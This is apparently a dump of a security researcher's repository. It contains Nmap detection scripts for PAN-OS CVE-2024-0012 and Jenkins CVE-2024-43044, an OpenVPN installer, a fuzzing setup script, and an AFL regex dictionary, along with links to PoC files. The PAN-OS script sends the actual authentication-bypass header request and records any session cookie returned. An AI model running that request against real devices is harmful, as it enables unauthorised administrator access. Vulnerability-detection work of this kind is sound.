"safe"} 46 | 47 | portrule = shortport.http 48 | 49 | local function match_response(response) 50 | if not response or not response.body then return false end 51 | 52 | local has_title = response.body:match("Zero Touch Provisioning") or 53 | response.body:match("Zero Touch Provisioning %(ZTP%)") 54 | local has_script = response.body:match("/scripts/cache/mainui.javascript") 55 | local has_session = response.header["set-cookie"] and 56 | response.header["set-cookie"]:match("PHPSESSID=") 57 | 58 | return has_title and has_script and has_session 59 | end 60 | 61 | action = function(host, port) 62 | local vuln_table = { 63 | title = "Palo Alto Networks PAN-OS Authentication Bypass", 64 | state = vulns.STATE.NOT_VULN, 65 | description = [[ 66 | An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated 67 | attacker with network access to the management web interface to gain PAN-OS administrator privileges. 68 | ]], 69 | IDS = {CVE = 'CVE-2024-0012'}, 70 | references = { 71 | 'https://security.paloaltonetworks.com/CVE-2024-0012', 72 | 'https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/' 73 | }, 74 | dates = { 75 | disclosure = {year = '2024', month = '11', day = '19'}, 76 | } 77 | } 78 | local report = vulns.Report:new(SCRIPT_NAME, host, port) 79 | 80 | local opts = { 81 | header = { 82 | ["X-PAN-AUTHCHECK"] = "off", 83 | ["Connection"] = "keep-alive" 84 | }, 85 | redirect_ok = false 86 | } 87 | 88 | local response = http.get(host, port, "/php/ztp_gate.php/.js.map", opts) 89 | 90 | if response and response.status == 200 then 91 | if match_response(response) then 92 | vuln_table.state = vulns.STATE.VULN 93 | vuln_table.extra_info = "Target is vulnerable to CVE-2024-0012. Authentication bypass successful." 94 | 95 | if response.header["set-cookie"] then 96 | vuln_table.extra_info = vuln_table.extra_info .. "\nSession cookie obtained: " .. 97 | response.header["set-cookie"] 98 | end 99 | end 100 | end 101 | 102 | return report:make_output(vuln_table) 103 | end 104 | 105 | -- Reference from nuclei-templates 106 | -------------------------------------------------------------------------------- /http-vuln-cve2024-43044.nse: -------------------------------------------------------------------------------- 1 | local http = require "http" 2 | local shortport = require "shortport" 3 | local string = require "string" 4 | local vulns = require "vulns" 5 | local nmap = require "nmap" 6 | 7 | description = [[ 8 | Detects if a Jenkins instance is potentially vulnerable to CVE-2024-43044, 9 | an arbitrary file read vulnerability that allows an agent to read files from the controller. 10 | 11 | References: 12 | * https://www.jenkins.io/security/advisory/2024-03-27/ 13 | * https://github.com/convisolabs/CVE-2024-43044-jenkins 14 | ]] 15 | 16 | --- 17 | -- @usage 18 | -- nmap -p --script jenkins-cve-2024-43044-detector 19 | -- 20 | -- @output 21 | -- PORT STATE SERVICE 22 | -- 8080/tcp open http-proxy 23 | -- | jenkins-cve-2024-43044-detector: 24 | -- | VULNERABLE: 25 | -- | Jenkins Arbitrary File Read Vulnerability (CVE-2024-43044) 26 | -- | State: LIKELY VULNERABLE 27 | -- | Description: 28 | -- | Jenkins versions before 2.440, LTS 2.426.3 are potentially vulnerable to 29 | -- | CVE-2024-43044, which allows arbitrary file read from the controller. 30 | -- | Disclosure date: 2024-03-27 31 | -- | References: 32 | -- |_ https://www.jenkins.io/security/advisory/2024-03-27/ 33 | 34 | author = "Dhiraj Mishra (@RandomDhiraj)" -- NMAP Script 35 | license = "Same as Nmap--See https://nmap.org/book/man-legal.html" 36 | categories = {"vuln", "safe"} 37 | 38 | portrule = shortport.http 39 | 40 | local function get_jenkins_version(host, port) 41 | local response = http.get(host, port, "/") 42 | if response.status == 200 then 43 | local version = response.header["x-jenkins"] or "" 44 | return version 45 | end 46 | return nil 47 | end 48 | 49 | local function is_vulnerable(version) 50 | if not version then return false end 51 | 52 | local major, minor, patch = version:match("(%d+)%.(%d+)%.?(%d*)") 53 | major, minor, patch = tonumber(major), tonumber(minor), tonumber(patch) 54 | 55 | if not major or not minor then return false end 56 | 57 | if major < 2 then return true end 58 | if major == 2 and minor < 440 then return true end 59 | if major == 2 and minor == 426 and (not patch or patch < 3) then return true end 60 | 61 | return false 62 | end 63 | 64 | action = function(host, port) 65 | local vuln_table = { 66 | title = "Jenkins Arbitrary File Read Vulnerability (CVE-2024-43044)", 67 | state = vulns.STATE.NOT_VULN, 68 | description = [[ 69 | Jenkins versions before 2.440, LTS 2.426.3 are potentially vulnerable to 70 | CVE-2024-43044, which allows arbitrary file read from the controller.]], 71 | references = { 72 | 'https://www.jenkins.io/security/advisory/2024-03-27/', 73 | 'https://github.com/convisolabs/CVE-2024-43044-jenkins', 74 | 'https://blog.convisoappsec.com/en/analysis-of-cve-2024-43044/' 75 | }, 76 | dates = { 77 | disclosure = {year = 2024, month = 03, day = 27}, 78 | }, 79 | } 80 | 81 | local report = vulns.Report:new(SCRIPT_NAME, host, port) 82 | local version = get_jenkins_version(host, port) 83 | 84 | if version then 85 | if is_vulnerable(version) then 86 | vuln_table.state = vulns.STATE.LIKELY_VULN 87 | end 88 | vuln_table.extra_info = string.format("Detected Jenkins version: %s", version) 89 | else 90 | vuln_table.state = vulns.STATE.UNKNOWN 91 | vuln_table.extra_info = "Could not determine Jenkins version" 92 | end 93 | 94 | return report:make_output(vuln_table) 95 | end 96 | -------------------------------------------------------------------------------- /magic.mgc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RootUp/PersonalStuff/1c49beb7ec96ccbb9709d4453b76c43e0557bb28/magic.mgc -------------------------------------------------------------------------------- /objdump_testcase: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RootUp/PersonalStuff/1c49beb7ec96ccbb9709d4453b76c43e0557bb28/objdump_testcase -------------------------------------------------------------------------------- /openvpn-install.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # https://github.com/Nyr/openvpn-install 4 | # 5 | # Copyright (c) 2013 Nyr. Released under the MIT License. 6 | 7 | 8 | if grep -qs "14.04" /etc/os-release; then 9 | echo "Ubuntu 14.04 is too old and not supported" 10 | exit 11 | fi 12 | 13 | if grep -qs "jessie" /etc/os-release; then 14 | echo "Debian 8 is too old and not supported" 15 | exit 16 | fi 17 | 18 | if grep -qs "CentOS release 6" /etc/redhat-release; then 19 | echo "CentOS 6 is too old and not supported" 20 | exit 21 | fi 22 | 23 | if grep -qs "Ubuntu 16.04" /etc/os-release; then 24 | echo 'Ubuntu 16.04 is no longer supported in the current version of openvpn-install 25 | Use an older version if Ubuntu 16.04 support is needed: https://git.io/vpn1604' 26 | exit 27 | fi 28 | 29 | # Detect Debian users running the script with "sh" instead of bash 30 | if readlink /proc/$$/exe | grep -q "dash"; then 31 | echo "This script needs to be run with bash, not sh" 32 | exit 33 | fi 34 | 35 | if [[ "$EUID" -ne 0 ]]; then 36 | echo "Sorry, you need to run this as root" 37 | exit 38 | fi 39 | 40 | if [[ ! -e /dev/net/tun ]]; then 41 | echo "The TUN device is not available 42 | You need to enable TUN before running this script" 43 | exit 44 | fi 45 | 46 | if ! iptables -t nat -nL &>/dev/null; then 47 | echo "Unable to initialize the iptables/netfilter NAT table, setup can't continue. 48 | Make sure that your system has iptables/netfilter available. 49 | If using OpenVZ, ask your provider to enable full netfilter support." 50 | exit 51 | fi 52 | 53 | if [[ -e /etc/debian_version ]]; then 54 | os="debian" 55 | group_name="nogroup" 56 | elif [[ -e /etc/centos-release || -e /etc/redhat-release ]]; then 57 | os="centos" 58 | group_name="nobody" 59 | else 60 | echo "Looks like you aren't running this installer on Debian, Ubuntu or CentOS" 61 | exit 62 | fi 63 | 64 | new_client () { 65 | # Generates the custom client.ovpn 66 | { 67 | cat /etc/openvpn/server/client-common.txt 68 | echo "" 69 | cat /etc/openvpn/server/easy-rsa/pki/ca.crt 70 | echo "" 71 | echo "" 72 | sed -ne '/BEGIN CERTIFICATE/,$ p' /etc/openvpn/server/easy-rsa/pki/issued/"$1".crt 73 | echo "" 74 | echo "" 75 | cat /etc/openvpn/server/easy-rsa/pki/private/"$1".key 76 | echo "" 77 | echo "" 78 | sed -ne '/BEGIN OpenVPN Static key/,$ p' /etc/openvpn/server/tc.key 79 | echo "" 80 | } > ~/"$1".ovpn 81 | } 82 | 83 | if [[ -e /etc/openvpn/server/server.conf ]]; then 84 | while : 85 | do 86 | clear 87 | echo "Looks like OpenVPN is already installed." 88 | echo 89 | echo "What do you want to do?" 90 | echo " 1) Add a new user" 91 | echo " 2) Revoke an existing user" 92 | echo " 3) Remove OpenVPN" 93 | echo " 4) Exit" 94 | read -p "Select an option: " option 95 | until [[ "$option" =~ ^[1-4]$ ]]; do 96 | echo "$option: invalid selection." 97 | read -p "Select an option: " option 98 | done 99 | case "$option" in 100 | 1) 101 | echo 102 | echo "Tell me a name for the client certificate." 103 | read -p "Client name: " unsanitized_client 104 | client=$(sed 's/[^0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_-]/_/g' <<< "$unsanitized_client") 105 | while [[ -z "$client" || -e /etc/openvpn/server/easy-rsa/pki/issued/"$client".crt ]]; do 106 | echo "$client: invalid client name." 107 | read -p "Client name: " unsanitized_client 108 | client=$(sed 's/[^0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_-]/_/g' <<< "$unsanitized_client") 109 | done 110 | cd /etc/openvpn/server/easy-rsa/ 111 | EASYRSA_CERT_EXPIRE=3650 ./easyrsa build-client-full "$client" nopass 112 | # Generates the custom client.ovpn 113 | new_client "$client" 114 | echo 115 | echo "Client $client added, configuration is available at:" ~/"$client.ovpn" 116 | exit 117 | ;; 118 | 2) 119 | # This option could be documented a bit better and maybe even be simplified 120 | # ...but what can I say, I want some sleep too 121 | number_of_clients=$(tail -n +2 /etc/openvpn/server/easy-rsa/pki/index.txt | grep -c "^V") 122 | if [[ "$number_of_clients" = 0 ]]; then 123 | echo 124 | echo "You have no existing clients!" 125 | exit 126 | fi 127 | echo 128 | echo "Select the existing client certificate you want to revoke:" 129 | tail -n +2 /etc/openvpn/server/easy-rsa/pki/index.txt | grep "^V" | cut -d '=' -f 2 | nl -s ') ' 130 | read -p "Select one client: " client_number 131 | until [[ "$client_number" =~ ^[0-9]+$ && "$client_number" -le "$number_of_clients" ]]; do 132 | echo "$client_number: invalid selection." 133 | read -p "Select one client: " client_number 134 | done 135 | client=$(tail -n +2 /etc/openvpn/server/easy-rsa/pki/index.txt | grep "^V" | cut -d '=' -f 2 | sed -n "$client_number"p) 136 | echo 137 | read -p "Do you really want to revoke access for client $client? [y/N]: " revoke 138 | until [[ "$revoke" =~ ^[yYnN]*$ ]]; do 139 | echo "$revoke: invalid selection." 140 | read -p "Do you really want to revoke access for client $client? [y/N]: " revoke 141 | done 142 | if [[ "$revoke" =~ ^[yY]$ ]]; then 143 | cd /etc/openvpn/server/easy-rsa/ 144 | ./easyrsa --batch revoke "$client" 145 | EASYRSA_CRL_DAYS=3650 ./easyrsa gen-crl 146 | rm -f pki/reqs/"$client".req 147 | rm -f pki/private/"$client".key 148 | rm -f pki/issued/"$client".crt 149 | rm -f /etc/openvpn/server/crl.pem 150 | cp /etc/openvpn/server/easy-rsa/pki/crl.pem /etc/openvpn/server/crl.pem 151 | # CRL is read with each client connection, when OpenVPN is dropped to nobody 152 | chown nobody:"$group_name" /etc/openvpn/server/crl.pem 153 | echo 154 | echo "Certificate for client $client revoked!" 155 | else 156 | echo 157 | echo "Certificate revocation for client $client aborted!" 158 | fi 159 | exit 160 | ;; 161 | 3) 162 | echo 163 | read -p "Do you really want to remove OpenVPN? [y/N]: " remove 164 | until [[ "$remove" =~ ^[yYnN]*$ ]]; do 165 | echo "$remove: invalid selection." 166 | read -p "Do you really want to remove OpenVPN? [y/N]: " remove 167 | done 168 | if [[ "$remove" =~ ^[yY]$ ]]; then 169 | port=$(grep '^port ' /etc/openvpn/server/server.conf | cut -d " " -f 2) 170 | protocol=$(grep '^proto ' /etc/openvpn/server/server.conf | cut -d " " -f 2) 171 | if pgrep firewalld; then 172 | ip=$(firewall-cmd --direct --get-rules ipv4 nat POSTROUTING | grep '\-s 10.8.0.0/24 '"'"'!'"'"' -d 10.8.0.0/24 -j SNAT --to ' | cut -d " " -f 10) 173 | # Using both permanent and not permanent rules to avoid a firewalld reload. 174 | firewall-cmd --remove-port="$port"/"$protocol" 175 | firewall-cmd --zone=trusted --remove-source=10.8.0.0/24 176 | firewall-cmd --permanent --remove-port="$port"/"$protocol" 177 | firewall-cmd --permanent --zone=trusted --remove-source=10.8.0.0/24 178 | firewall-cmd --direct --remove-rule ipv4 nat POSTROUTING 0 -s 10.8.0.0/24 ! -d 10.8.0.0/24 -j SNAT --to "$ip" 179 | firewall-cmd --permanent --direct --remove-rule ipv4 nat POSTROUTING 0 -s 10.8.0.0/24 ! -d 10.8.0.0/24 -j SNAT --to "$ip" 180 | else 181 | systemctl disable --now openvpn-iptables.service 182 | rm -f /etc/systemd/system/openvpn-iptables.service 183 | fi 184 | if sestatus 2>/dev/null | grep "Current mode" | grep -q "enforcing" && [[ "$port" != 1194 ]]; then 185 | semanage port -d -t openvpn_port_t -p "$protocol" "$port" 186 | fi 187 | systemctl disable --now openvpn-server@server.service 188 | rm -rf /etc/openvpn/server 189 | rm -f /etc/systemd/system/openvpn-server@server.service.d/disable-limitnproc.conf 190 | rm -f /etc/sysctl.d/30-openvpn-forward.conf 191 | if [[ "$os" = "debian" ]]; then 192 | apt-get remove --purge -y openvpn 193 | else 194 | yum remove openvpn -y 195 | fi 196 | echo 197 | echo "OpenVPN removed!" 198 | else 199 | echo 200 | echo "Removal aborted!" 201 | fi 202 | exit 203 | ;; 204 | 4) exit;; 205 | esac 206 | done 207 | else 208 | clear 209 | echo "Welcome to this OpenVPN "road warrior" installer!" 210 | echo 211 | echo "I need to ask you a few questions before starting setup." 212 | echo "You can use the default options and just press enter if you are ok with them." 213 | # If system has a single IPv4, it is selected automatically. Else, ask the user 214 | if [[ $(ip addr | grep inet | grep -v inet6 | grep -vEc '127\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}') -eq 1 ]]; then 215 | ip=$(ip addr | grep inet | grep -v inet6 | grep -vE '127\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | cut -d '/' -f 1 | grep -oE '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}') 216 | else 217 | number_of_ips=$(ip addr | grep inet | grep -v inet6 | grep -vEc '127\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}') 218 | echo 219 | echo "What IPv4 address should the OpenVPN server bind to?" 220 | ip addr | grep inet | grep -v inet6 | grep -vE '127\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | cut -d '/' -f 1 | grep -oE '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | nl -s ') ' 221 | read -p "IPv4 address [1]: " ip_number 222 | until [[ -z "$ip_number" || "$ip_number" =~ ^[0-9]+$ && "$ip_number" -le "$number_of_ips" ]]; do 223 | echo "$ip_number: invalid selection." 224 | read -p "IPv4 address [1]: " ip_number 225 | done 226 | [[ -z "$ip_number" ]] && ip_number="1" 227 | ip=$(ip addr | grep inet | grep -v inet6 | grep -vE '127\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | cut -d '/' -f 1 | grep -oE '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | sed -n "$ip_number"p) 228 | fi 229 | # If $IP is a private IP address, the server must be behind NAT 230 | if echo "$ip" | grep -qE '^(10\.|172\.1[6789]\.|172\.2[0-9]\.|172\.3[01]\.|192\.168)'; then 231 | echo 232 | echo "This server is behind NAT. What is the public IPv4 address or hostname?" 233 | get_public_ip=$(wget -4qO- "http://whatismyip.akamai.com/" || curl -4Ls "http://whatismyip.akamai.com/") 234 | read -p "Public IPv4 address / hostname [$get_public_ip]: " public_ip 235 | [ -z "$public_ip" ] && public_ip="$get_public_ip" 236 | fi 237 | echo 238 | echo "Which protocol do you want for OpenVPN connections?" 239 | echo " 1) UDP (recommended)" 240 | echo " 2) TCP" 241 | read -p "Protocol [1]: " protocol 242 | until [[ -z "$protocol" || "$protocol" =~ ^[12]$ ]]; do 243 | echo "$protocol: invalid selection." 244 | read -p "Protocol [1]: " protocol 245 | done 246 | case "$protocol" in 247 | 1|"") 248 | protocol=udp 249 | ;; 250 | 2) 251 | protocol=tcp 252 | ;; 253 | esac 254 | echo 255 | echo "What port do you want OpenVPN listening to?" 256 | read -p "Port [1194]: " port 257 | until [[ -z "$port" || "$port" =~ ^[0-9]+$ && "$port" -le 65535 ]]; do 258 | echo "$port: invalid selection." 259 | read -p "Port [1194]: " port 260 | done 261 | [[ -z "$port" ]] && port="1194" 262 | echo 263 | echo "Which DNS do you want to use with the VPN?" 264 | echo " 1) Current system resolvers" 265 | echo " 2) 1.1.1.1" 266 | echo " 3) Google" 267 | echo " 4) OpenDNS" 268 | echo " 5) Verisign" 269 | read -p "DNS [1]: " dns 270 | until [[ -z "$dns" || "$dns" =~ ^[1-5]$ ]]; do 271 | echo "$dns: invalid selection." 272 | read -p "DNS [1]: " dns 273 | done 274 | echo 275 | echo "Finally, tell me a name for the client certificate." 276 | read -p "Client name [client]: " unsanitized_client 277 | # Allow a limited set of characters to avoid conflicts 278 | client=$(sed 's/[^0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_-]/_/g' <<< "$unsanitized_client") 279 | [[ -z "$client" ]] && client="client" 280 | echo 281 | echo "Okay, that was all I needed. We are ready to set up your OpenVPN server now." 282 | read -n1 -r -p "Press any key to continue..." 283 | # If running inside a container, disable LimitNPROC to prevent conflicts 284 | if systemd-detect-virt -cq; then 285 | mkdir /etc/systemd/system/openvpn-server@server.service.d/ 2>/dev/null 286 | echo "[Service] 287 | LimitNPROC=infinity" > /etc/systemd/system/openvpn-server@server.service.d/disable-limitnproc.conf 288 | fi 289 | if [[ "$os" = "debian" ]]; then 290 | apt-get update 291 | apt-get install openvpn iptables openssl ca-certificates -y 292 | else 293 | # Else, the distro is CentOS 294 | yum install epel-release -y 295 | yum install openvpn iptables openssl ca-certificates -y 296 | fi 297 | # Get easy-rsa 298 | easy_rsa_url='https://github.com/OpenVPN/easy-rsa/releases/download/v3.0.5/EasyRSA-nix-3.0.5.tgz' 299 | wget -O ~/easyrsa.tgz "$easy_rsa_url" 2>/dev/null || curl -Lo ~/easyrsa.tgz "$easy_rsa_url" 300 | tar xzf ~/easyrsa.tgz -C ~/ 301 | mv ~/EasyRSA-3.0.5/ /etc/openvpn/server/ 302 | mv /etc/openvpn/server/EasyRSA-3.0.5/ /etc/openvpn/server/easy-rsa/ 303 | chown -R root:root /etc/openvpn/server/easy-rsa/ 304 | rm -f ~/easyrsa.tgz 305 | cd /etc/openvpn/server/easy-rsa/ 306 | # Create the PKI, set up the CA and the server and client certificates 307 | ./easyrsa init-pki 308 | ./easyrsa --batch build-ca nopass 309 | EASYRSA_CERT_EXPIRE=3650 ./easyrsa build-server-full server nopass 310 | EASYRSA_CERT_EXPIRE=3650 ./easyrsa build-client-full "$client" nopass 311 | EASYRSA_CRL_DAYS=3650 ./easyrsa gen-crl 312 | # Move the stuff we need 313 | cp pki/ca.crt pki/private/ca.key pki/issued/server.crt pki/private/server.key pki/crl.pem /etc/openvpn/server 314 | # CRL is read with each client connection, when OpenVPN is dropped to nobody 315 | chown nobody:"$group_name" /etc/openvpn/server/crl.pem 316 | # Generate key for tls-crypt 317 | openvpn --genkey --secret /etc/openvpn/server/tc.key 318 | # Create the DH parameters file using the predefined ffdhe2048 group 319 | echo '-----BEGIN DH PARAMETERS----- 320 | MIIBCAKCAQEA//////////+t+FRYortKmq/cViAnPTzx2LnFg84tNpWp4TZBFGQz 321 | +8yTnc4kmz75fS/jY2MMddj2gbICrsRhetPfHtXV/WVhJDP1H18GbtCFY2VVPe0a 322 | 87VXE15/V8k1mE8McODmi3fipona8+/och3xWKE2rec1MKzKT0g6eXq8CrGCsyT7 323 | YdEIqUuyyOP7uWrat2DX9GgdT0Kj3jlN9K5W7edjcrsZCwenyO4KbXCeAvzhzffi 324 | 7MA0BM0oNC9hkXL+nOmFg/+OTxIy7vKBg8P+OxtMb61zO7X8vC7CIAXFjvGDfRaD 325 | ssbzSibBsu/6iGtCOGEoXJf//////////wIBAg== 326 | -----END DH PARAMETERS-----' > /etc/openvpn/server/dh.pem 327 | # Generate server.conf 328 | echo "local $ip 329 | port $port 330 | proto $protocol 331 | dev tun 332 | ca ca.crt 333 | cert server.crt 334 | key server.key 335 | dh dh.pem 336 | auth SHA512 337 | tls-crypt tc.key 338 | topology subnet 339 | server 10.8.0.0 255.255.255.0 340 | ifconfig-pool-persist ipp.txt" > /etc/openvpn/server/server.conf 341 | echo 'push "redirect-gateway def1 bypass-dhcp"' >> /etc/openvpn/server/server.conf 342 | # DNS 343 | case "$dns" in 344 | 1|"") 345 | # Locate the proper resolv.conf 346 | # Needed for systems running systemd-resolved 347 | if grep -q "127.0.0.53" "/etc/resolv.conf"; then 348 | resolv_conf="/run/systemd/resolve/resolv.conf" 349 | else 350 | resolv_conf="/etc/resolv.conf" 351 | fi 352 | # Obtain the resolvers from resolv.conf and use them for OpenVPN 353 | grep -v '#' "$resolv_conf" | grep nameserver | grep -E -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | while read line; do 354 | echo "push \"dhcp-option DNS $line\"" >> /etc/openvpn/server/server.conf 355 | done 356 | ;; 357 | 2) 358 | echo 'push "dhcp-option DNS 1.1.1.1"' >> /etc/openvpn/server/server.conf 359 | echo 'push "dhcp-option DNS 1.0.0.1"' >> /etc/openvpn/server/server.conf 360 | ;; 361 | 3) 362 | echo 'push "dhcp-option DNS 8.8.8.8"' >> /etc/openvpn/server/server.conf 363 | echo 'push "dhcp-option DNS 8.8.4.4"' >> /etc/openvpn/server/server.conf 364 | ;; 365 | 4) 366 | echo 'push "dhcp-option DNS 208.67.222.222"' >> /etc/openvpn/server/server.conf 367 | echo 'push "dhcp-option DNS 208.67.220.220"' >> /etc/openvpn/server/server.conf 368 | ;; 369 | 5) 370 | echo 'push "dhcp-option DNS 64.6.64.6"' >> /etc/openvpn/server/server.conf 371 | echo 'push "dhcp-option DNS 64.6.65.6"' >> /etc/openvpn/server/server.conf 372 | ;; 373 | esac 374 | echo "keepalive 10 120 375 | cipher AES-256-CBC 376 | user nobody 377 | group $group_name 378 | persist-key 379 | persist-tun 380 | status openvpn-status.log 381 | verb 3 382 | crl-verify crl.pem" >> /etc/openvpn/server/server.conf 383 | if [[ "$protocol" = "udp" ]]; then 384 | echo "explicit-exit-notify" >> /etc/openvpn/server/server.conf 385 | fi 386 | # Enable net.ipv4.ip_forward for the system 387 | echo 'net.ipv4.ip_forward=1' > /etc/sysctl.d/30-openvpn-forward.conf 388 | # Enable without waiting for a reboot or service restart 389 | echo 1 > /proc/sys/net/ipv4/ip_forward 390 | if pgrep firewalld; then 391 | # Using both permanent and not permanent rules to avoid a firewalld 392 | # reload. 393 | # We don't use --add-service=openvpn because that would only work with 394 | # the default port and protocol. 395 | firewall-cmd --add-port="$port"/"$protocol" 396 | firewall-cmd --zone=trusted --add-source=10.8.0.0/24 397 | firewall-cmd --permanent --add-port="$port"/"$protocol" 398 | firewall-cmd --permanent --zone=trusted --add-source=10.8.0.0/24 399 | # Set NAT for the VPN subnet 400 | firewall-cmd --direct --add-rule ipv4 nat POSTROUTING 0 -s 10.8.0.0/24 ! -d 10.8.0.0/24 -j SNAT --to "$ip" 401 | firewall-cmd --permanent --direct --add-rule ipv4 nat POSTROUTING 0 -s 10.8.0.0/24 ! -d 10.8.0.0/24 -j SNAT --to "$ip" 402 | else 403 | # Create a service to set up persistent iptables rules 404 | echo "[Unit] 405 | Before=network.target 406 | [Service] 407 | Type=oneshot 408 | ExecStart=/sbin/iptables -t nat -A POSTROUTING -s 10.8.0.0/24 ! -d 10.8.0.0/24 -j SNAT --to $ip 409 | ExecStart=/sbin/iptables -I INPUT -p $protocol --dport $port -j ACCEPT 410 | ExecStart=/sbin/iptables -I FORWARD -s 10.8.0.0/24 -j ACCEPT 411 | ExecStart=/sbin/iptables -I FORWARD -m state --state RELATED,ESTABLISHED -j ACCEPT 412 | ExecStop=/sbin/iptables -t nat -D POSTROUTING -s 10.8.0.0/24 ! -d 10.8.0.0/24 -j SNAT --to $ip 413 | ExecStop=/sbin/iptables -D INPUT -p $protocol --dport $port -j ACCEPT 414 | ExecStop=/sbin/iptables -D FORWARD -s 10.8.0.0/24 -j ACCEPT 415 | ExecStop=/sbin/iptables -D FORWARD -m state --state RELATED,ESTABLISHED -j ACCEPT 416 | RemainAfterExit=yes 417 | [Install] 418 | WantedBy=multi-user.target" > /etc/systemd/system/openvpn-iptables.service 419 | systemctl enable --now openvpn-iptables.service 420 | fi 421 | # If SELinux is enabled and a custom port was selected, we need this 422 | if sestatus 2>/dev/null | grep "Current mode" | grep -q "enforcing" && [[ "$port" != 1194 ]]; then 423 | # Install semanage if not already present 424 | if ! hash semanage 2>/dev/null; then 425 | if grep -qs "CentOS Linux release 7" "/etc/centos-release"; then 426 | yum install policycoreutils-python -y 427 | else 428 | yum install policycoreutils-python-utils -y 429 | fi 430 | fi 431 | semanage port -a -t openvpn_port_t -p "$protocol" "$port" 432 | fi 433 | # If the server is behind a NAT, use the correct IP address 434 | if [[ "$public_ip" != "" ]]; then 435 | ip="$public_ip" 436 | fi 437 | # client-common.txt is created so we have a template to add further users later 438 | echo "client 439 | dev tun 440 | proto $protocol 441 | remote $ip $port 442 | resolv-retry infinite 443 | nobind 444 | persist-key 445 | persist-tun 446 | remote-cert-tls server 447 | auth SHA512 448 | cipher AES-256-CBC 449 | ignore-unknown-option block-outside-dns 450 | block-outside-dns 451 | verb 3" > /etc/openvpn/server/client-common.txt 452 | # Enable and start the OpenVPN service 453 | systemctl enable --now openvpn-server@server.service 454 | # Generates the custom client.ovpn 455 | new_client "$client" 456 | echo 457 | echo "Finished!" 458 | echo 459 | echo "Your client configuration is available at:" ~/"$client.ovpn" 460 | echo "If you want to add more clients, just run this script again!" 461 | fi 462 | -------------------------------------------------------------------------------- /pack.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | base_dir=$pwd 3 | 4 | echo "[+] Installing common libraries for enhanced fuzzing support" 5 | sudo apt-get update && sudo apt-get -y upgrade 6 | sudo apt-get install -y build-essential nmap build-essential llvm libcairo2-dev \ 7 | libpango1.0-dev libjpeg-dev libgif-dev librsvg2-dev nmap afl-clang git curl wireshark clang gdb bison \ 8 | libbison-dev zita-rev1 python-parsley btyacc bnfc racc libreadline-dev libssl-dev libpq5 libpq-dev \ 9 | libreadline5 libsqlite3-dev libpcap-dev autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev \ 10 | libyaml-dev curl zlib1g-dev gawk bison libffi-dev libgdbm-dev libncurses5-dev libtool sqlite3 libgmp-dev \ 11 | gnupg2 dirmngr screen re2c pkg-config lib32asan2 valgrind qt4-qmake libqt4-dev tcpdump cmake python3 flex \ 12 | make openssl libgbm1 gdbserver net-tools fontconfig libpango1.0-dev libxft2 libxft-dev libcups2-dev libcork-dev \ 13 | libqt5core5a libqtcore4 libqt5gui5 libqt5network5 libqt4-network libreadline-dev libconfig-dev libssl-dev \ 14 | lua5.2 liblua5.2-dev libevent-dev libjansson-dev libpython-dev fossil libavis-dev harvid libavahi-glib-dev \ 15 | libswscale-dev liba52-0.7.4-dev libxcb-xkb-dev libxcb-composite0-dev libdssialsacompat-dev alsa-utils \ 16 | libao-dev apt-file python-pip dput librivet-dev libcue-dev libbellesip-dev libbctoolbox-dev libantlr3c-dev \ 17 | nvptx-tools texi2html libgnutls-dane0 gnuastro auctex a2ps ; sudo apt-get install -y --reinstall texinfo ; sudo apt-get install -y libgd-dev \ 18 | libsynctex-dev unrar php7.1 postgresql-client-10 libqt4-sql-psql pspg libsipwitch-dev sipwitch p7zip-full zlib1g libzzip-dev \ 19 | libsdl2-dev openssh-server libelf-dev zstd libboost-all-dev g++ automake autoconf autoconf-archive libtool liblz4-dev liblzma-dev \ 20 | zlib1g-dev make libjsoncpp-dev libiberty-dev qemu-kvm qemu virt-manager libavcodec-dev libavutil-dev virt-viewer libvirt-bin \ 21 | libdlna-dev winff mencoder libdlna-dev libchromaprint-dev libchromaprint-tools libchromaprint1 libsoxr-dev libcap-dev libsoxr0 checkinstall \ 22 | 23 | echo "[+] Installing AFLplusplus" 24 | git clone https://github.com/vanhauser-thc/AFLplusplus.git 25 | cd AFLplusplus/ 26 | make 27 | cd qemu_mode/ 28 | ./build_qemu_support.sh 29 | cd .. 30 | cd llvm_mode/ 31 | make all 32 | cd .. 33 | sudo make install 34 | 35 | # Tested on 4.15.0-72-generic Ubuntu 18.04 36 | -------------------------------------------------------------------------------- /poc.pdf.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RootUp/PersonalStuff/1c49beb7ec96ccbb9709d4453b76c43e0557bb28/poc.pdf.zip -------------------------------------------------------------------------------- /poc_sixel: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RootUp/PersonalStuff/1c49beb7ec96ccbb9709d4453b76c43e0557bb28/poc_sixel -------------------------------------------------------------------------------- /regex.dict: -------------------------------------------------------------------------------- 1 | # 2 | # AFL dictionary for regex 3 | # -------------------------- 4 | # 5 | # Contains various regular expressions. 6 | # 7 | # Created by Yang Guo 8 | # 9 | # Contributed by Dhiraj Mishra 10 | # 11 | "?" 12 | "abc" 13 | "()" 14 | "[]" 15 | "abc|def" 16 | "abc|def|ghi" 17 | "^xxx$" 18 | "ab\\b\\d\\bcd" 19 | "\\w|\\d" 20 | "a*?" 21 | "abc+" 22 | "abc+?" 23 | 